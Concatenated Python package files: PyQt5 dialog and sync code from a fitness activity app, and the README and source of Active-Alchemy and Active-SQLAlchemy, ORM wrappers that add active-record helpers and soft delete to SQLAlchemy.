state: Optional[defaultdict] = None
def ensure_loaded(self):
if self.state is not None:
return
try:
self.state = defaultdict(
dict, {UUID(k): v for k, v in serialise.load(paths.SYNC_STATE).items()}
)
except FileNotFoundError:
self.state = defaultdict(dict)
def write(self):
serialise.dump(
{str(k): v for k, v in self.state.items()}, paths.SYNC_STATE, gz=True
)
def add(self, service, activity_id, service_activity_id):
self.state[activity_id] = {service: service_activity_id}
def get(self, service, activity_id):
return self.state[activity_id].get(service)
def sync(self, cookies, activities):
"""
Download new activities.
Returns a generator. The first value is the number of items after
it. The other items are Activities.
"""
yield from strava.sync_new(cookies["Strava"], activities, self)
sync_state = SyncState() | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/sync/__init__.py | __init__.py |
import datetime
import PyQt5
from PyQt5 import QtWidgets
from activate import activity_types
from activate.app import paths
from activate.app.dialogs import FormDialog
from activate.app.widgets import ActivityFlagEdit, DurationEdit, EffortEdit, Form
DELETE_ACTIVITY = 222 # 0xDE[lete]
class ManualActivityDialog(FormDialog):
def __init__(self, *args, **kwargs):
layout = {
"Name": QtWidgets.QLineEdit(),
"Type": QtWidgets.QComboBox(),
"Distance": QtWidgets.QDoubleSpinBox(),
"Start Time": QtWidgets.QDateTimeEdit(),
"Duration": DurationEdit(),
"Ascent": QtWidgets.QDoubleSpinBox(),
"Flags": ActivityFlagEdit(),
"Effort": EffortEdit(),
"Description": QtWidgets.QPlainTextEdit(),
}
layout["Type"].currentTextChanged.connect(layout["Flags"].change_options)
layout["Type"].addItems(activity_types.TYPES)
layout["Distance"].setRange(0, 100000)
layout["Ascent"].setRange(0, 100000)
super().__init__(Form(layout), *args, **kwargs)
self.setWindowTitle("Manual Activity")
def accept(self):
if self.form.fields["Duration"].value() > datetime.timedelta(0):
super().accept()
class EditActivityDialog(FormDialog):
def __init__(self, *args, **kwargs):
layout = {
"Name": QtWidgets.QLineEdit(),
"Type": QtWidgets.QComboBox(),
"Flags": ActivityFlagEdit(),
"Effort": EffortEdit(),
"Description": QtWidgets.QPlainTextEdit(),
}
layout["Type"].currentTextChanged.connect(layout["Flags"].change_options)
layout["Type"].addItems(activity_types.TYPES)
super().__init__(Form(layout), *args, **kwargs)
self.setWindowTitle("Edit Activity")
self.add_delete_button()
def add_delete_button(self):
self.delete_button = QtWidgets.QPushButton("Delete Activity")
self.delete_button.setIcon(PyQt5.QtGui.QIcon.fromTheme("edit-delete"))
self.delete_button.clicked.connect(self.handle_delete_button)
self.main_layout.insertWidget(1, self.delete_button)
def apply_to_activity(self, data):
"""Apply the settings to an self.activity."""
self.activity.name = data["Name"]
self.activity.sport = data["Type"]
self.activity.description = data["Description"]
self.activity.flags = data["Flags"]
self.activity.effort_level = data["Effort"]
self.activity.save(paths.ACTIVITIES)
def handle_delete_button(self):
confirm_box = QtWidgets.QMessageBox()
confirm_box.setText(f"Are you sure you want to delete {self.activity.name}?")
confirm_box.setStandardButtons(
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No
)
result = confirm_box.exec()
if result == QtWidgets.QMessageBox.Yes:
self.done(DELETE_ACTIVITY)
def exec(self, activity):
self.activity = activity
result = super().exec(
{
"Name": self.activity.name,
"Type": self.activity.sport,
"Flags": self.activity.flags,
"Effort": self.activity.effort_level,
"Description": self.activity.description,
}
)
if isinstance(result, dict):
self.apply_to_activity(result)
return result
class EditManualActivityDialog(EditActivityDialog, ManualActivityDialog):
def __init__(self, *args, **kwargs):
ManualActivityDialog.__init__(self, *args, **kwargs)
self.setWindowTitle("Edit Activity")
self.add_delete_button()
def apply_to_activity(self, data):
super().apply_to_activity(data)
self.activity.track.length = data["Distance"]
self.activity.track.start_time = data["Start Time"]
self.activity.track.elapsed_time = data["Duration"]
self.activity.track.ascent = data["Ascent"]
def exec(self, activity):
self.activity = activity
result = ManualActivityDialog.exec(
self,
{
"Name": self.activity.name,
"Type": self.activity.sport,
"Distance": self.activity.track.length / 1000,
"Start Time": self.activity.track.start_time,
"Duration": self.activity.track.elapsed_time,
"Ascent": self.activity.track.ascent,
"Flags": self.activity.flags,
"Effort": self.activity.effort_level,
"Description": self.activity.description,
},
)
if isinstance(result, dict):
self.apply_to_activity(result)
return result | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/dialogs/activity.py | activity.py |
import PyQt5
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon
from activate.app import connect, settings, widgets
from activate.app.dialogs import FormDialog
from activate.app.ui.settings import Ui_settings
from activate.app.widgets import Form
class AddServerDialog(FormDialog):
def __init__(self, *args, **kwargs):
layout = {
"Address": QtWidgets.QLineEdit(),
"Name": QtWidgets.QLineEdit(),
"Username": QtWidgets.QLineEdit(),
"Password": QtWidgets.QLineEdit(),
}
layout["Password"].setEchoMode(layout["Password"].Password)
super().__init__(Form(layout), *args, **kwargs)
self.setWindowTitle("Add Server")
class SettingsDialog(QtWidgets.QDialog, Ui_settings):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setupUi(self)
self.settings_tabs.setTabIcon(0, QIcon.fromTheme("settings-configure"))
self.settings_tabs.setTabIcon(1, QIcon.fromTheme("measure"))
self.settings_tabs.setTabIcon(2, QIcon.fromTheme("network-server"))
self.settings_tabs.setTabIcon(3, QIcon.fromTheme("folder-sync"))
self.add_server_button.setIcon(PyQt5.QtGui.QIcon.fromTheme("list-add"))
self.custom_units = widgets.CustomUnits(self)
self.units_tab_layout.addLayout(self.custom_units)
self.units_tab_layout.setAlignment(Qt.AlignTop)
def add_server(self):
result = AddServerDialog().exec({})
if not result:
return
self.server_table.add_row()
self.server_table.set_server(
self.server_table.rowCount() - 1, connect.Server(*result.values())
)
def load_from_settings(self, current_settings: settings.Settings):
"""Load a Settings object to the UI widgets."""
self.map_tiles_edit.setText(
current_settings.tiles if current_settings.tiles is not None else ""
)
self.cookie_edit.setText(
current_settings.cookie if current_settings.cookie is not None else ""
)
self.map_speed_edit.setValue(current_settings.map_speed)
self.unit_system.setCurrentText(current_settings.unit_system)
self.server_table.set_servers(current_settings.servers)
self.custom_units.set_units(current_settings.custom_units)
def get_settings(self) -> settings.Settings:
"""Get a Settings object from the UI widgets."""
tiles = self.map_tiles_edit.toPlainText()
if not tiles:
tiles = None
cookie = self.cookie_edit.text()
if not cookie:
cookie = None
return settings.Settings(
tiles=tiles,
map_speed=self.map_speed_edit.value(),
unit_system=self.unit_system.currentText(),
servers=self.server_table.get_servers(),
custom_units=self.custom_units.units_dict(),
cookie=cookie,
)
def exec(self, current_settings, page):
self.settings_tabs.setCurrentIndex(
("General", "Units", "Servers", "Sync").index(page)
)
self.load_from_settings(current_settings)
result = super().exec()
if not result:
return current_settings
new_settings = self.get_settings()
new_settings.save()
return new_settings | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/dialogs/settings.py | settings.py |
# Active-Alchemy
**Version 1.x.x***
---
Active-Alchemy is wrapper around SQLAlchemy that makes it simple to use
your models in an active record like manner, while it still uses the SQLAlchemy `db.session` underneath.
Active-Alchemy was created as solution to use my flask's application's model
without the need to use Flask-SQLAlchemy outside of Flask projects.
What you may like about Active-Alchemy:
- Just by instantiating with `ActiveAlchemy()`, ActiveAlchemy automatically creates
the session, model and everything necessary for SQLAlchemy.
- It provides easy methods such as `query()`, `create()`, `update()`, `delete()`,
to select, create, update, delete entries respectively.
- It automatically create a primary key for your table
- It adds the following columns: `id`, `created_at`, `updated_at`, `is_deleted`, `deleted_at`
- When `delete()`, it soft deletes the entry so it doesn't get queried. But it still
exists in the database. This feature allows you to un-delete an entry
- It uses Arrow for DateTime
- DateTime is saved in UTC and uses the ArrowType from the SQLAlchemy-Utils
- Added some data types: JSONType, EmailType, and the whole SQLAlchemy-Utils Type
- db.now -> gives you the Arrow UTC type
- It is still SQLAlchemy. You can access all the SQLAlchemy awesomeness
---
## Quick Overview:
#### Create the model
from active_alchemy import ActiveAlchemy
db = ActiveAlchemy('sqlite://')
class User(db.Model):
name = db.Column(db.String(25))
location = db.Column(db.String(50), default="USA")
last_access = db.Column(db.Datetime)
#### Retrieve all records
for user in User.query():
print(user.name)
#### Create new record
user = User.create(name="Mardix", location="Moon")
# or
user = User(name="Mardix", location="Moon").save()
#### Get a record by primary key (id)
user = User.get(1234)
#### Update record from primary key
user = User.get(1234)
if user:
user.update(location="Neptune")
#### Update record from query iteration
for user in User.query():
user.update(last_access=db.utcnow());
#### Soft Delete a record
user = User.get(1234)
if user:
user.delete()
#### Query Records
users = User.query(User.location.distinct())
for user in users:
...
#### Query with filter
all = User.query().filter(User.location == "USA")
for user in users:
...
## How to use
### Install
pip install active_alchemy
### Create a connection
The `ActiveAlchemy` class is used to instantiate a SQLAlchemy connection to
a database.
from active_alchemy import ActiveAlchemy
db = ActiveAlchemy(dialect+driver://username:password@host:port/database)
#### Databases Drivers & DB Connection examples
Active-Alchemy comes with a `PyMySQL` and `PG8000` as drivers for MySQL
and PostgreSQL respectively, because they are in pure Python. But you can use
other drivers for better performance. `SQLite` is already built in Python.
**SQLite:**
from active_alchemy import ActiveAlchemy
db = ActiveAlchemy("sqlite://") # in memory
# or
db = ActiveAlchemy("sqlite:///foo.db") # DB file
**PostgreSql:**
from active_alchemy import ActiveAlchemy
db = ActiveAlchemy("postgresql+pg8000://user:password@host:port/dbname")
**PyMySQL:**
from active_alchemy import ActiveAlchemy
db = ActiveAlchemy("mysql+pymysql://user:password@host:port/dbname")
---
Active-Alchemy also provides access to all the SQLAlchemy
functions from the ``sqlalchemy`` and ``sqlalchemy.orm`` modules.
So you can declare models like the following examples:
### Create a Model
To start, create a model class and extends it with db.Model
# mymodel.py
from active_alchemy import ActiveAlchemy
db = ActiveAlchemy("sqlite://")
class MyModel(db.Model):
name = db.Column(db.String(25))
is_live = db.Column(db.Boolean, default=False)
# Put at the end of the model module to auto create all models
db.create_all()
- Upon creation of the table, db.Model will add the following columns: ``id``, ``created_at``, ``upated_at``, ``is_deleted``, ``deleted_at``
- It does an automatic table naming (if no table name is already defined using the ``__tablename__`` property)
by using the class name. So, for example, a ``User`` model gets a table named ``user``, ``TodoList`` becomes ``todo_list``
The name will not be plurialized.
---
## Models: *db.Model*
**db.Model** extends your model with helpers that turn your model into an active record like model. But underneath, it still uses the ``db.session``
**db.Model** also adds a few preset columns on the table:
``id``: The primary key
``created_at``: Datetime. It contains the creation date of the record
``updated_at``: Datetime. It is updated whenever the record is updated.
``deleted_at``: Datetime. Contains the datetime the record was soft-deleted.
``is_deleted``: Boolean. A flag to set if record is soft-deleted or not
**-- About Soft Delete --**
By definition, soft-delete marks a record as deleted so it doesn't get queried, but it still exists in the database. To actually delete the record itself, a hard delete must apply.
By default, when a record is deleted, **Active-Alchemy** actually sets ``is_deleted`` to True and excludes it from being queried, and ``deleted_at`` is also set. But this happens only when using the method ``db.Model.delete()``.
When a record is soft-deleted, you can also undelete a record by doing: ``db.Model.delete(False)``
Now, to completely delete off the table, ``db.Model.delete(hard_delete=True)``
**-- Querying with *db.Model.query()* --**
Due to the fact that **Active-Alchemy** has soft-delete, to query a model without the soft-deleted records, you must query your model by using the ``all(*args, **kwargs)`` which returns a db.session.query object for you to apply filter on etc.
**-- db.BaseModel --**
By default ``db.Model`` adds several preset columns on the table, if you don't want to have them in your model, you can use instead ``db.BaseModel``, which still give you access to the methods to query your model.
``BaseModel`` by default assumes that your primary key is ``id``, but it
class MyExistingModel(db.BaseModel):
__tablename__ = "my_old_table"
__primary_key__ = "my_pk_id"
my_pk_id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
...
---
### db.Model Methods Description
#### query(\*args, \*\*kwargs)
To start querying the DB and returns a ``db.session.query`` object to filter or apply more conditions.
for user in User.query():
print(user.login)
By default `query()` will show only all non-soft-delete records. To display both deleted and non deleted items, add the arg: ``include_deleted=True``
for user in User.query(include_deleted=True):
print(user.login)
To select columns...
for user in User.query(User.name.distinct(), User.location):
print(user.login)
To use with filter...
all = User
.query(User.name.distinct, User.location)
.order_by(User.updated_at.desc())
.filter(User.location == "Charlotte")
#### get(id)
Get one record by id. By default it will query only a record that is not soft-deleted
id = 1234
user = User.get(id)
print(user.id)
print(user.login)
To query a record that has been soft deleted, just set the argument ``include_deleted=True``
id = 234
user = User.get(id, include_deleted=True)
#### create(\*\*kwargs)
To create/insert new record. Same as __init__, but just a shortcut to it.
record = User.create(login='abc', passw_hash='hash', profile_id=123)
print (record.login) # -> abc
or you can use the __init__ with save()
record = User(login='abc', passw_hash='hash', profile_id=123).save()
print (record.login) # -> abc
or
record = User(login='abc', passw_hash='hash', profile_id=123)
record.save()
print (record.login) # -> abc
#### update(\*\*kwargs)
Update an existing record
record = User.get(124)
record.update(login='new_login')
print (record.login) # -> new_login
#### delete()
To soft delete a record. ``is_deleted`` will be set to True and ``deleted_at`` datetime will be set
record = User.get(124)
record.delete()
print (record.is_deleted) # -> True
To soft **UNdelete** a record. ``is_deleted`` will be set to False and ``deleted_at`` datetime will be None
record = User.get(124)
record.delete(delete=False)
print (record.is_deleted) # -> False
To HARD delete a record. The record will be deleted completely
record = User.get(124)
record.delete(hard_delete=True)
#### save()
A shortcut to ``session.add`` + ``session.commit()``
record = User.get(124)
record.login = "Another one"
record.save()
---
#### Method Chaining
For convenience, some method chaining are available
user = User(name="Mardix", location="Charlotte").save()
User.get(12345).update(location="Atlanta")
User.get(345).delete().delete(False).update(location="St. Louis")
---
#### Aggegated selects
class Product(db.Model):
name = db.Column(db.String(250))
price = db.Column(db.Numeric)
price_label = db.func.sum(Product.price).label('price')
results = Product.query(price_label)
---
## With Web Application
In a web application you need to call ``db.session.remove()`` after each response, and ``db.session.rollback()`` if an error occurs. However, if you are using Flask or other framework that uses the `after_request` and ``on_exception`` decorators, these bindings it is done automatically.
For example using Flask, you can do:
app = Flask(__name__)
db = ActiveAlchemy('sqlite://', app=app)
or
db = ActiveAlchemy()
app = Flask(__name__)
db.init_app(app)
### More examples
#### Many databases, one web app
app = Flask(__name__)
db1 = ActiveAlchemy(URI1, app)
db2 = ActiveAlchemy(URI2, app)
#### Many web apps, one database
db = ActiveAlchemy(URI1)
app1 = Flask(__name__)
app2 = Flask(__name__)
db.init_app(app1)
db.init_app(app2)
---
## Pagination
All the results can be easily paginated
users = User.paginate(page=2, per_page=20)
print(list(users)) # [User(21), User(22), User(23), ... , User(40)]
The paginator object it's an iterable that returns only the results for that page, so you use it in your templates in the same way than the original result:
{% for item in paginated_items %}
<li>{{ item.name }}</li>
{% endfor %}
Rendering the pages
Below your results is common that you want it to render the list of pages.
The ``paginator.pages`` property is an iterator that returns the page numbers, but sometimes not all of them: if there are more than 11 pages, the result will be one of these, depending of what is the current page:
Skipped page numbers are represented as ``None``.
How many items are displayed can be controlled calling ``paginator.iter_pages`` instead.
This is one way how you could render such a pagination in your templates:
{% macro pagination(paginator, endpoint=None, class_='pagination') %}
{% if not endpoint %}
{% set endpoint = request.endpoint %}
{% endif %}
{% if "page" in kwargs %}
{% do kwargs.pop("page") %}
{% endif %}
<nav>
<ul class="{{ class_ }}">
{%- if paginator.has_prev %}
<li><a href="{{ url_for(endpoint, page=paginator.prev_page_number, **kwargs) }}"
rel="me prev"><span aria-hidden="true">«</span></a></li>
{% else %}
<li class="disabled"><span><span aria-hidden="true">«</span></span></li>
{%- endif %}
{%- for page in paginator.pages %}
{% if page %}
{% if page != paginator.page %}
<li><a href="{{ url_for(endpoint, page=page, **kwargs) }}"
rel="me">{{ page }}</a></li>
{% else %}
<li class="active"><span>{{ page }}</span></li>
{% endif %}
{% else %}
<li><span class=ellipsis>…</span></li>
{% endif %}
{%- endfor %}
{%- if paginator.has_next %}
<li><a href="{{ url_for(endpoint, page=paginator.next_page_number, **kwargs) }}"
rel="me next">»</a></li>
{% else %}
<li class="disabled"><span aria-hidden="true">»</span></li>
{%- endif %}
</ul>
</nav>
{% endmacro %}
______
#### Credits:
[SQLAlchemy](http://www.sqlalchemy.org/)
[Flask-SQLAlchemy](https://pythonhosted.org/Flask-SQLAlchemy)
[SQLAlchemy-Wrapper](https://github.com/lucuma/sqlalchemy-wrapper)
[Paginator](https://github.com/mardix/paginator.py)
[Arrow](http://crsmithdev.com/arrow/)
[SQLAlchemy-Utils](https://sqlalchemy-utils.readthedocs.io)
---
copyright: 2015-2016
license: MIT, see LICENSE for more details.
| Active-Alchemy | /Active-Alchemy-1.1.0.tar.gz/Active-Alchemy-1.1.0/README.md | README.md |
NAME = "Active-Alchemy"
# ------------------------------------------------------------------------------
import threading
import json
import datetime
import sqlalchemy
from sqlalchemy import *
from sqlalchemy.orm import scoped_session, sessionmaker, Query
from sqlalchemy.engine.url import make_url
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.schema import MetaData
from paginator import Paginator
import inflection
import sqlalchemy_utils as sa_utils
import arrow
DEFAULT_PER_PAGE = 10
utcnow = arrow.utcnow
def _create_scoped_session(db, query_cls):
session = sessionmaker(autoflush=True, autocommit=False,
bind=db.engine, query_cls=query_cls)
return scoped_session(session)
def _tablemaker(db):
def make_sa_table(*args, **kwargs):
if len(args) > 1 and isinstance(args[1], db.Column):
args = (args[0], db.metadata) + args[1:]
kwargs.setdefault('bind_key', None)
info = kwargs.pop('info', None) or {}
info.setdefault('bind_key', None)
kwargs['info'] = info
return sqlalchemy.Table(*args, **kwargs)
return make_sa_table
def _include_sqlalchemy(db):
for module in sqlalchemy, sqlalchemy.orm:
for key in module.__all__:
if not hasattr(db, key):
setattr(db, key, getattr(module, key))
db.Table = _tablemaker(db)
db.event = sqlalchemy.event
db.utils = sa_utils
db.arrow = arrow
db.utcnow = utcnow
db.SADateTime = db.DateTime
db.DateTime = sa_utils.ArrowType
db.JSONType = sa_utils.JSONType
db.EmailType = sa_utils.EmailType
class BaseQuery(Query):
def get_or_error(self, uid, error):
"""Like :meth:`get` but raises an error if not found instead of
returning `None`.
"""
rv = self.get(uid)
if rv is None:
if isinstance(error, Exception):
raise error
return error()
return rv
def first_or_error(self, error):
"""Like :meth:`first` but raises an error if not found instead of
returning `None`.
"""
rv = self.first()
if rv is None:
if isinstance(error, Exception):
raise error
return error()
return rv
def paginate(self, **kwargs):
"""Paginate this results.
Returns an :class:`Paginator` object.
"""
return Paginator(self, **kwargs)
class ModelTableNameDescriptor(object):
"""
Create the table name if it doesn't exist.
"""
def __get__(self, obj, type):
tablename = type.__dict__.get('__tablename__')
if not tablename:
tablename = inflection.underscore(type.__name__)
setattr(type, '__tablename__', tablename)
return tablename
class EngineConnector(object):
def __init__(self, sa_obj):
self._sa_obj = sa_obj
self._engine = None
self._connected_for = None
self._lock = threading.Lock()
def get_engine(self):
with self._lock:
uri = self._sa_obj.uri
info = self._sa_obj.info
options = self._sa_obj.options
echo = options.get('echo')
if (uri, echo) == self._connected_for:
return self._engine
self._engine = engine = sqlalchemy.create_engine(info, **options)
self._connected_for = (uri, echo)
return engine
class BaseModel(object):
"""
Baseclass for custom user models.
"""
__tablename__ = ModelTableNameDescriptor()
__primary_key__ = "id" # String
def __iter__(self):
"""Returns an iterable that supports .next()
so we can do dict(sa_instance).
"""
for k in self.__dict__.keys():
if not k.startswith('_'):
yield (k, getattr(self, k))
def __repr__(self):
return '<%s>' % self.__class__.__name__
def to_dict(self):
"""
Return an entity as dict
:returns dict:
"""
return {c.name: getattr(self, c.name) for c in self.__table__.columns}
def to_json(self):
"""
Convert the entity to JSON
:returns str:
"""
data = {}
for k, v in self.to_dict().items():
if isinstance(v, (datetime.datetime, sa_utils.ArrowType, arrow.Arrow)):
v = v.isoformat()
data[k] = v
return json.dumps(data)
@classmethod
def get(cls, pk):
"""
Select entry by its primary key. It must be define as
__primary_key__ (string)
"""
return cls._query(cls).filter(getattr(cls, cls.__primary_key__) == pk).first()
@classmethod
def create(cls, **kwargs):
"""
To create a new record
:returns object: The new record
"""
record = cls(**kwargs).save()
return record
def update(self, **kwargs):
"""
Update an entry
"""
for k, v in kwargs.items():
setattr(self, k, v)
self.save()
return self
@classmethod
def query(cls, *args):
"""
:returns query:
"""
if not args:
query = cls._query(cls)
else:
query = cls._query(*args)
return query
def save(self):
"""
Shortcut to add and save + rollback
"""
try:
self.db.add(self)
self.db.commit()
return self
except Exception as e:
self.db.rollback()
raise
def delete(self, delete=True, hard_delete=False):
"""
Soft delete a record
:param delete: Bool - To soft-delete/soft-undelete a record
:param hard_delete: Bool - *** Not applicable under BaseModel
"""
try:
self.db.session.delete(self)
return self.db.commit()
except Exception as e:
self.db.rollback()
raise
class Model(BaseModel):
"""
Model create
"""
id = Column(Integer, primary_key=True)
created_at = Column(sa_utils.ArrowType, default=utcnow)
updated_at = Column(sa_utils.ArrowType, default=utcnow, onupdate=utcnow)
is_deleted = Column(Boolean, default=False, index=True)
deleted_at = Column(sa_utils.ArrowType, default=None)
@classmethod
def query(cls, *args, **kwargs):
"""
:returns query:
:**kwargs:
- include_deleted bool: True To filter in deleted records.
By default it is set to False
"""
if not args:
query = cls._query(cls)
else:
query = cls._query(*args)
if "include_deleted" not in kwargs or kwargs["include_deleted"] is False:
query = query.filter(cls.is_deleted != True)
return query
@classmethod
def get(cls, id, include_deleted=False):
"""
Select entry by id
:param id: The id of the entry
:param include_deleted: It should not query deleted record. Set to True to get all
"""
return cls.query(include_deleted=include_deleted)\
.filter(cls.id == id)\
.first()
def delete(self, delete=True, hard_delete=False):
"""
Soft delete a record
:param delete: Bool - To soft-delete/soft-undelete a record
:param hard_delete: Bool - If true it will completely delete the record
"""
# Hard delete
if hard_delete:
try:
self.db.session.delete(self)
return self.db.commit()
except:
self.db.rollback()
raise
else:
data = {
"is_deleted": delete,
"deleted_at": utcnow() if delete else None
}
self.update(**data)
return self
class ActiveAlchemy(object):
"""This class is used to instantiate a SQLAlchemy connection to
a database.
db = ActiveAlchemy(_uri_to_database_)
The class also provides access to all the SQLAlchemy
functions from the :mod:`sqlalchemy` and :mod:`sqlalchemy.orm` modules.
So you can declare models like this::
class User(db.Model):
login = db.Column(db.String(80), unique=True)
passw_hash = db.Column(db.String(80))
In a web application you need to call `db.session.remove()`
after each response, and `db.session.rollback()` if an error occurs.
If your application object has a `after_request` and `on_exception
decorators, just pass that object at creation::
app = Flask(__name__)
db = ActiveAlchemy('sqlite://', app=app)
or later::
db = ActiveAlchemy()
app = Flask(__name__)
db.init_app(app)
.. admonition:: Check types carefully
Don't perform type or `isinstance` checks against `db.Table`, which
emulates `Table` behavior but is not a class. `db.Table` exposes the
`Table` interface, but is a function which allows omission of metadata.
"""
def __init__(self, uri='sqlite://',
app=None,
echo=False,
pool_size=None,
pool_timeout=None,
pool_recycle=None,
convert_unicode=True,
query_cls=BaseQuery):
self.uri = uri
self.info = make_url(uri)
self.options = self._cleanup_options(
echo=echo,
pool_size=pool_size,
pool_timeout=pool_timeout,
pool_recycle=pool_recycle,
convert_unicode=convert_unicode,
)
self.connector = None
self._engine_lock = threading.Lock()
self.session = _create_scoped_session(self, query_cls=query_cls)
self.Model = declarative_base(cls=Model, name='Model')
self.BaseModel = declarative_base(cls=BaseModel, name='BaseModel')
self.Model.db, self.BaseModel.db = self, self
self.Model._query, self.BaseModel._query = self.session.query, self.session.query
if app is not None:
self.init_app(app)
_include_sqlalchemy(self)
def _cleanup_options(self, **kwargs):
options = dict([
(key, val)
for key, val in kwargs.items()
if val is not None
])
return self._apply_driver_hacks(options)
def _apply_driver_hacks(self, options):
if "mysql" in self.info.drivername:
self.info.query.setdefault('charset', 'utf8')
options.setdefault('pool_size', 10)
options.setdefault('pool_recycle', 7200)
elif self.info.drivername == 'sqlite':
no_pool = options.get('pool_size') == 0
memory_based = self.info.database in (None, '', ':memory:')
if memory_based and no_pool:
raise ValueError(
'SQLite in-memory database with an empty queue'
' (pool_size = 0) is not possible due to data loss.'
)
return options
def init_app(self, app):
"""This callback can be used to initialize an application for the
use with this database setup. In a web application or a multithreaded
environment, never use a database without initialize it first,
or connections will leak.
"""
if not hasattr(app, 'databases'):
app.databases = []
if isinstance(app.databases, list):
if self in app.databases:
return
app.databases.append(self)
def shutdown(response=None):
self.session.remove()
return response
def rollback(error=None):
try:
self.session.rollback()
except Exception:
pass
self.set_flask_hooks(app, shutdown, rollback)
def set_flask_hooks(self, app, shutdown, rollback):
if hasattr(app, 'after_request'):
app.after_request(shutdown)
if hasattr(app, 'on_exception'):
app.on_exception(rollback)
@property
def engine(self):
"""Gives access to the engine. """
with self._engine_lock:
connector = self.connector
if connector is None:
connector = EngineConnector(self)
self.connector = connector
return connector.get_engine()
@property
def metadata(self):
"""Proxy for Model.metadata"""
return self.Model.metadata
@property
def query(self):
"""Proxy for session.query"""
return self.session.query
def add(self, *args, **kwargs):
"""Proxy for session.add"""
return self.session.add(*args, **kwargs)
def flush(self, *args, **kwargs):
"""Proxy for session.flush"""
return self.session.flush(*args, **kwargs)
def commit(self):
"""Proxy for session.commit"""
return self.session.commit()
def rollback(self):
"""Proxy for session.rollback"""
return self.session.rollback()
def create_all(self):
"""Creates all tables. """
self.Model.metadata.create_all(bind=self.engine)
def drop_all(self):
"""Drops all tables. """
self.Model.metadata.drop_all(bind=self.engine)
def reflect(self, meta=None):
"""Reflects tables from the database. """
meta = meta or MetaData()
meta.reflect(bind=self.engine)
return meta
def __repr__(self):
return "<SQLAlchemy('{0}')>".format(self.uri) | Active-Alchemy | /Active-Alchemy-1.1.0.tar.gz/Active-Alchemy-1.1.0/active_alchemy.py | active_alchemy.py |
NAME = "Active-SQLAlchemy"
# ------------------------------------------------------------------------------
import sys
import re
import threading
import json
import datetime
import sqlalchemy
from sqlalchemy import *
from sqlalchemy.orm import scoped_session, sessionmaker, Query
from sqlalchemy.engine.url import make_url
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.schema import MetaData
from math import ceil
from paginator import Paginator
# _compat
PY2 = sys.version_info[0] == 2
if PY2:
string_type = (basestring, )
xrange = xrange
else:
string_type = str
xrange = range
DEFAULT_PER_PAGE = 10
def _create_scoped_session(db, query_cls):
session = sessionmaker(autoflush=True, autocommit=False,
bind=db.engine, query_cls=query_cls)
return scoped_session(session)
def _tablemaker(db):
def make_sa_table(*args, **kwargs):
if len(args) > 1 and isinstance(args[1], db.Column):
args = (args[0], db.metadata) + args[1:]
kwargs.setdefault('bind_key', None)
info = kwargs.pop('info', None) or {}
info.setdefault('bind_key', None)
kwargs['info'] = info
return sqlalchemy.Table(*args, **kwargs)
return make_sa_table
def _include_sqlalchemy(db):
for module in sqlalchemy, sqlalchemy.orm:
for key in module.__all__:
if not hasattr(db, key):
setattr(db, key, getattr(module, key))
db.Table = _tablemaker(db)
db.event = sqlalchemy.event
def _sanitize_page_number(page):
if page == 'last':
return page
if isinstance(page, string_type) and page.isdigit():
page = int(page)
if isinstance(page, int) and (page > 0):
return page
return 1
def _underscore(word):
"""
Make an underscored, lowercase form from the expression in the string.
_underscore('DeviceType') -> device_type
"""
word = re.sub(r"([A-Z]+)([A-Z][a-z])", r'\1_\2', word)
word = re.sub(r"([a-z\d])([A-Z])", r'\1_\2', word)
word = word.replace("-", "_")
return word.lower()
class BaseQuery(Query):
def get_or_error(self, uid, error):
"""Like :meth:`get` but raises an error if not found instead of
returning `None`.
"""
rv = self.get(uid)
if rv is None:
if isinstance(error, Exception):
raise error
return error()
return rv
def first_or_error(self, error):
"""Like :meth:`first` but raises an error if not found instead of
returning `None`.
"""
rv = self.first()
if rv is None:
if isinstance(error, Exception):
raise error
return error()
return rv
def paginate(self, **kwargs):
"""Paginate this results.
Returns an :class:`Paginator` object.
"""
return Paginator(self, **kwargs)
class ModelTableNameDescriptor(object):
"""
Create the table name if it doesn't exist.
"""
def __get__(self, obj, type):
tablename = type.__dict__.get('__tablename__')
if not tablename:
tablename = _underscore(type.__name__)
setattr(type, '__tablename__', tablename)
return tablename
class EngineConnector(object):
def __init__(self, sa_obj):
self._sa_obj = sa_obj
self._engine = None
self._connected_for = None
self._lock = threading.Lock()
def get_engine(self):
with self._lock:
uri = self._sa_obj.uri
info = self._sa_obj.info
options = self._sa_obj.options
echo = options.get('echo')
if (uri, echo) == self._connected_for:
return self._engine
self._engine = engine = sqlalchemy.create_engine(info, **options)
self._connected_for = (uri, echo)
return engine
class IDMixin(object):
"""
A mixin to add an id
"""
id = Column(Integer, primary_key=True)
class BaseModel(object):
"""
Baseclass for custom user models.
"""
__tablename__ = ModelTableNameDescriptor()
def __iter__(self):
"""Returns an iterable that supports .next()
so we can do dict(sa_instance).
"""
for k in self.__dict__.keys():
if not k.startswith('_'):
yield (k, getattr(self, k))
def __repr__(self):
return '<%s>' % self.__class__.__name__
def to_dict(self):
"""
Return an entity as dict
:returns dict:
"""
return {c.name: getattr(self, c.name) for c in self.__table__.columns}
def to_json(self):
"""
Convert the entity to JSON
:returns str:
"""
data = {}
for k, v in self.to_dict().items():
if isinstance(v, datetime.datetime):
v = v.isoformat()
data[k] = v
return json.dumps(data)
@classmethod
def get(cls, id):
"""
Select entry by id
:param id: The id of the entry
"""
return cls.query(cls).filter(cls.id == id).first()
@classmethod
def create(cls, **kwargs):
"""
To create a new record
:returns object: The new record
"""
record = cls(**kwargs).save()
return record
def update(self, **kwargs):
"""
Update an entry
"""
for k, v in kwargs.items():
setattr(self, k, v)
self.save()
return self
@classmethod
def all(cls, *args):
"""
:returns query:
"""
if not args:
query = cls.query(cls)
else:
query = cls.query(*args)
return query
def save(self):
"""
Shortcut to add and save + rollback
"""
try:
self.db.add(self)
self.db.commit()
return self
except Exception as e:
self.db.rollback()
raise
def delete(self, delete=True, hard_delete=False):
"""
Soft delete a record
:param delete: Bool - To soft-delete/soft-undelete a record
:param hard_delete: Bool - *** Not applicable under BaseModel
"""
try:
self.db.session.delete(self)
return self.db.commit()
except Exception as e:
self.db.rollback()
raise
